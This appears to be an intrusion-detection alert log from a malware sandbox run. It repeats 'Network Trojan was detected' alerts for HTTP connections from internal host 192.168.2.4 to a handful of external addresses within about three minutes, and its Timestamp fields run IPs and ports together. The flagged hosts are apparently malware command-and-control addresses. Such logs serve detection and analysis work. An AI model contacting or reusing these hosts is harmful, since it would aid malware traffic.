                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350465802027700 01/05/23-09:00:30.922357
                                SID:2027700
                                Source Port:50465
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349846802027700 01/05/23-08:59:04.030877
                                SID:2027700
                                Source Port:49846
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350113802027700 01/05/23-08:59:51.349297
                                SID:2027700
                                Source Port:50113
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350122802027700 01/05/23-08:59:52.258206
                                SID:2027700
                                Source Port:50122
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949765802027700 01/05/23-08:58:40.524108
                                SID:2027700
                                Source Port:49765
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950164802027700 01/05/23-08:59:57.736953
                                SID:2027700
                                Source Port:50164
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950810802027700 01/05/23-09:01:06.209228
                                SID:2027700
                                Source Port:50810
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950155802027700 01/05/23-08:59:55.492248
                                SID:2027700
                                Source Port:50155
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350163802027700 01/05/23-08:59:57.745667
                                SID:2027700
                                Source Port:50163
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350342802027700 01/05/23-09:00:17.462633
                                SID:2027700
                                Source Port:50342
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949888802027700 01/05/23-08:59:10.718152
                                SID:2027700
                                Source Port:49888
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350437802027700 01/05/23-09:00:27.511836
                                SID:2027700
                                Source Port:50437
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950709802027700 01/05/23-09:00:57.338565
                                SID:2027700
                                Source Port:50709
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950365802027700 01/05/23-09:00:20.472738
                                SID:2027700
                                Source Port:50365
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350491802027700 01/05/23-09:00:35.341719
                                SID:2027700
                                Source Port:50491
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949933802027700 01/05/23-08:59:16.543995
                                SID:2027700
                                Source Port:49933
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350446802027700 01/05/23-09:00:28.538778
                                SID:2027700
                                Source Port:50446
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350049802027700 01/05/23-08:59:43.341281
                                SID:2027700
                                Source Port:50049
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350666802027700 01/05/23-09:00:53.231240
                                SID:2027700
                                Source Port:50666
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949961802027700 01/05/23-08:59:25.029663
                                SID:2027700
                                Source Port:49961
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350135802027700 01/05/23-08:59:53.659768
                                SID:2027700
                                Source Port:50135
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950337802027700 01/05/23-09:00:16.961297
                                SID:2027700
                                Source Port:50337
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949831802027700 01/05/23-08:58:58.157060
                                SID:2027700
                                Source Port:49831
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350323802027700 01/05/23-09:00:13.669182
                                SID:2027700
                                Source Port:50323
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949914802027700 01/05/23-08:59:13.975728
                                SID:2027700
                                Source Port:49914
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950533802027700 01/05/23-09:00:39.141241
                                SID:2027700
                                Source Port:50533
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950746802027700 01/05/23-09:01:00.700179
                                SID:2027700
                                Source Port:50746
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950041802027700 01/05/23-08:59:42.178829
                                SID:2027700
                                Source Port:50041
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950384802027700 01/05/23-09:00:22.583512
                                SID:2027700
                                Source Port:50384
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950793802027700 01/05/23-09:01:04.637334
                                SID:2027700
                                Source Port:50793
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950441802027700 01/05/23-09:00:27.897047
                                SID:2027700
                                Source Port:50441
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350240802027700 01/05/23-09:00:04.980795
                                SID:2027700
                                Source Port:50240
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350583802027700 01/05/23-09:00:43.661148
                                SID:2027700
                                Source Port:50583
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949822802027700 01/05/23-08:58:55.711340
                                SID:2027700
                                Source Port:49822
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350068802027700 01/05/23-08:59:46.545693
                                SID:2027700
                                Source Port:50068
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350084802027700 01/05/23-08:59:48.213307
                                SID:2027700
                                Source Port:50084
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350281802027700 01/05/23-09:00:09.024525
                                SID:2027700
                                Source Port:50281
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350093802027700 01/05/23-08:59:49.254040
                                SID:2027700
                                Source Port:50093
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949850802027700 01/05/23-08:59:04.854937
                                SID:2027700
                                Source Port:49850
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350021802027700 01/05/23-08:59:35.303113
                                SID:2027700
                                Source Port:50021
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350011802027700 01/05/23-08:59:33.528127
                                SID:2027700
                                Source Port:50011
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950578802027700 01/05/23-09:00:43.144717
                                SID:2027700
                                Source Port:50578
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950238802027700 01/05/23-09:00:04.786770
                                SID:2027700
                                Source Port:50238
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350351802027700 01/05/23-09:00:18.584418
                                SID:2027700
                                Source Port:50351
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949749802027700 01/05/23-08:58:36.138379
                                SID:2027700
                                Source Port:49749
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950108802027700 01/05/23-08:59:50.925854
                                SID:2027700
                                Source Port:50108
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349862802027700 01/05/23-08:59:07.146602
                                SID:2027700
                                Source Port:49862
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950368802027700 01/05/23-09:00:20.805880
                                SID:2027700
                                Source Port:50368
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349992802027700 01/05/23-08:59:30.424541
                                SID:2027700
                                Source Port:49992
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4109.102.255.23049958802851815 01/05/23-08:59:24.515311
                                SID:2851815
                                Source Port:49958
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949905802027700 01/05/23-08:59:12.883945
                                SID:2027700
                                Source Port:49905
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350742802027700 01/05/23-09:01:00.399584
                                SID:2027700
                                Source Port:50742
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350078802027700 01/05/23-08:59:47.799332
                                SID:2027700
                                Source Port:50078
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950689802027700 01/05/23-09:00:55.573091
                                SID:2027700
                                Source Port:50689
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350675802027700 01/05/23-09:00:53.969195
                                SID:2027700
                                Source Port:50675
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949774802027700 01/05/23-08:58:46.360040
                                SID:2027700
                                Source Port:49774
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350262802027700 01/05/23-09:00:07.129484
                                SID:2027700
                                Source Port:50262
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350462802027700 01/05/23-09:00:30.446487
                                SID:2027700
                                Source Port:50462
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350205802027700 01/05/23-09:00:01.396939
                                SID:2027700
                                Source Port:50205
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350193802027700 01/05/23-09:00:00.354878
                                SID:2027700
                                Source Port:50193
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950219802027700 01/05/23-09:00:02.860408
                                SID:2027700
                                Source Port:50219
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949824802027700 01/05/23-08:58:56.317147
                                SID:2027700
                                Source Port:49824
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350529802027700 01/05/23-09:00:38.776017
                                SID:2027700
                                Source Port:50529
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350781802027700 01/05/23-09:01:03.812836
                                SID:2027700
                                Source Port:50781
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949885802027700 01/05/23-08:59:10.188635
                                SID:2027700
                                Source Port:49885
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950644802027700 01/05/23-09:00:49.753858
                                SID:2027700
                                Source Port:50644
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350002802027700 01/05/23-08:59:32.034230
                                SID:2027700
                                Source Port:50002
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950077802027700 01/05/23-08:59:47.458821
                                SID:2027700
                                Source Port:50077
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950716802027700 01/05/23-09:00:57.957311
                                SID:2027700
                                Source Port:50716
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350063802027700 01/05/23-08:59:45.640445
                                SID:2027700
                                Source Port:50063
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349871802027700 01/05/23-08:59:08.618933
                                SID:2027700
                                Source Port:49871
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949919802027700 01/05/23-08:59:14.693362
                                SID:2027700
                                Source Port:49919
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350725802027700 01/05/23-09:00:58.781214
                                SID:2027700
                                Source Port:50725
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950443802027700 01/05/23-09:00:28.233595
                                SID:2027700
                                Source Port:50443
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350667802027700 01/05/23-09:00:53.422304
                                SID:2027700
                                Source Port:50667
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350602802027700 01/05/23-09:00:45.014968
                                SID:2027700
                                Source Port:50602
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950734802027700 01/05/23-09:00:59.805370
                                SID:2027700
                                Source Port:50734
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350186802027700 01/05/23-08:59:59.609153
                                SID:2027700
                                Source Port:50186
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350791802027700 01/05/23-09:01:04.523822
                                SID:2027700
                                Source Port:50791
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350466802027700 01/05/23-09:00:31.441595
                                SID:2027700
                                Source Port:50466
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950597802027700 01/05/23-09:00:44.540035
                                SID:2027700
                                Source Port:50597
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350338802027700 01/05/23-09:00:17.057015
                                SID:2027700
                                Source Port:50338
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950594802027700 01/05/23-09:00:44.253324
                                SID:2027700
                                Source Port:50594
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350231802027700 01/05/23-09:00:04.106049
                                SID:2027700
                                Source Port:50231
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350629802027700 01/05/23-09:00:47.778768
                                SID:2027700
                                Source Port:50629
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350333802027700 01/05/23-09:00:17.108838
                                SID:2027700
                                Source Port:50333
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350580802027700 01/05/23-09:00:43.337556
                                SID:2027700
                                Source Port:50580
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350004802027700 01/05/23-08:59:32.357390
                                SID:2027700
                                Source Port:50004
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350096802027700 01/05/23-08:59:49.568203
                                SID:2027700
                                Source Port:50096
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349936802027700 01/05/23-08:59:17.032116
                                SID:2027700
                                Source Port:49936
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350552802027700 01/05/23-09:00:40.995877
                                SID:2027700
                                Source Port:50552
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949801802027700 01/05/23-08:58:52.530673
                                SID:2027700
                                Source Port:49801
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950278802027700 01/05/23-09:00:08.599518
                                SID:2027700
                                Source Port:50278
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350025802027700 01/05/23-08:59:35.998390
                                SID:2027700
                                Source Port:50025
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350411802027700 01/05/23-09:00:25.070861
                                SID:2027700
                                Source Port:50411
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350081802027700 01/05/23-08:59:47.974120
                                SID:2027700
                                Source Port:50081
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950273802027700 01/05/23-09:00:08.080432
                                SID:2027700
                                Source Port:50273
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350377802027700 01/05/23-09:00:21.862342
                                SID:2027700
                                Source Port:50377
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350513802027700 01/05/23-09:00:37.458508
                                SID:2027700
                                Source Port:50513
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350646802027700 01/05/23-09:00:50.400171
                                SID:2027700
                                Source Port:50646
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950777802027700 01/05/23-09:01:03.433856
                                SID:2027700
                                Source Port:50777
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350366802027700 01/05/23-09:00:20.451845
                                SID:2027700
                                Source Port:50366
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950599802027700 01/05/23-09:00:44.859960
                                SID:2027700
                                Source Port:50599
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.159.1849929802851115 01/05/23-08:59:16.604818
                                SID:2851115
                                Source Port:49929
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Attempted Administrator Privilege Gain
                                Timestamp:192.168.2.445.32.200.11350119802027700 01/05/23-08:59:52.128604
                                SID:2027700
                                Source Port:50119
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350236802027700 01/05/23-09:00:04.598812
                                SID:2027700
                                Source Port:50236
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950275802027700 01/05/23-09:00:08.323545
                                SID:2027700
                                Source Port:50275
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350349802027700 01/05/23-09:00:18.353498
                                SID:2027700
                                Source Port:50349
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950642802027700 01/05/23-09:00:48.975083
                                SID:2027700
                                Source Port:50642
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350042802027700 01/05/23-08:59:42.250950
                                SID:2027700
                                Source Port:50042
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950749802027700 01/05/23-09:01:00.980269
                                SID:2027700
                                Source Port:50749
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350261802027700 01/05/23-09:00:06.994802
                                SID:2027700
                                Source Port:50261
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350657802027700 01/05/23-09:00:52.746938
                                SID:2027700
                                Source Port:50657
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950464802027700 01/05/23-09:00:30.762088
                                SID:2027700
                                Source Port:50464
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350114802027700 01/05/23-08:59:51.579866
                                SID:2027700
                                Source Port:50114
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350322802027700 01/05/23-09:00:13.868410
                                SID:2027700
                                Source Port:50322
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950067802027700 01/05/23-08:59:46.015861
                                SID:2027700
                                Source Port:50067
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949834802027700 01/05/23-08:58:59.728507
                                SID:2027700
                                Source Port:49834
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950280802027700 01/05/23-09:00:08.893095
                                SID:2027700
                                Source Port:50280
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950418802027700 01/05/23-09:00:25.641858
                                SID:2027700
                                Source Port:50418
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949750802027700 01/05/23-08:58:36.660126
                                SID:2027700
                                Source Port:49750
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350165802027700 01/05/23-08:59:57.736479
                                SID:2027700
                                Source Port:50165
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950173802027700 01/05/23-08:59:58.308479
                                SID:2027700
                                Source Port:50173
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950614802027700 01/05/23-09:00:46.253642
                                SID:2027700
                                Source Port:50614
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350226802027700 01/05/23-09:00:03.668077
                                SID:2027700
                                Source Port:50226
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349898802027700 01/05/23-08:59:12.017608
                                SID:2027700
                                Source Port:49898
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350600802027700 01/05/23-09:00:44.794855
                                SID:2027700
                                Source Port:50600
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350756802027700 01/05/23-09:01:01.788290
                                SID:2027700
                                Source Port:50756
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350422802027700 01/05/23-09:00:25.959546
                                SID:2027700
                                Source Port:50422
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350735802027700 01/05/23-09:00:59.898829
                                SID:2027700
                                Source Port:50735
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349892802027700 01/05/23-08:59:11.451593
                                SID:2027700
                                Source Port:49892
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350282802027700 01/05/23-09:00:08.948723
                                SID:2027700
                                Source Port:50282
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350109802027700 01/05/23-08:59:50.885789
                                SID:2027700
                                Source Port:50109
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350086802027700 01/05/23-08:59:48.578736
                                SID:2027700
                                Source Port:50086
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350590802027700 01/05/23-09:00:43.905547
                                SID:2027700
                                Source Port:50590
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949985802027700 01/05/23-08:59:29.521467
                                SID:2027700
                                Source Port:49985
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350099802027700 01/05/23-08:59:50.050454
                                SID:2027700
                                Source Port:50099
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949855802027700 01/05/23-08:59:05.861340
                                SID:2027700
                                Source Port:49855
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950224802027700 01/05/23-09:00:03.416391
                                SID:2027700
                                Source Port:50224
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350473802027700 01/05/23-09:00:34.433386
                                SID:2027700
                                Source Port:50473
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350784802027700 01/05/23-09:01:04.067397
                                SID:2027700
                                Source Port:50784
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350797802027700 01/05/23-09:01:05.097008
                                SID:2027700
                                Source Port:50797
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350496802027700 01/05/23-09:00:35.953428
                                SID:2027700
                                Source Port:50496
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350127802027700 01/05/23-08:59:52.721045
                                SID:2027700
                                Source Port:50127
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949878802027700 01/05/23-08:59:09.247807
                                SID:2027700
                                Source Port:49878
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950046802027700 01/05/23-08:59:42.920533
                                SID:2027700
                                Source Port:50046
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949760802027700 01/05/23-08:58:39.158668
                                SID:2027700
                                Source Port:49760
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950112802027700 01/05/23-08:59:51.286474
                                SID:2027700
                                Source Port:50112
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950319802027700 01/05/23-09:00:12.949346
                                SID:2027700
                                Source Port:50319
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949890802027700 01/05/23-08:59:11.236775
                                SID:2027700
                                Source Port:49890
                                Destination Port:80
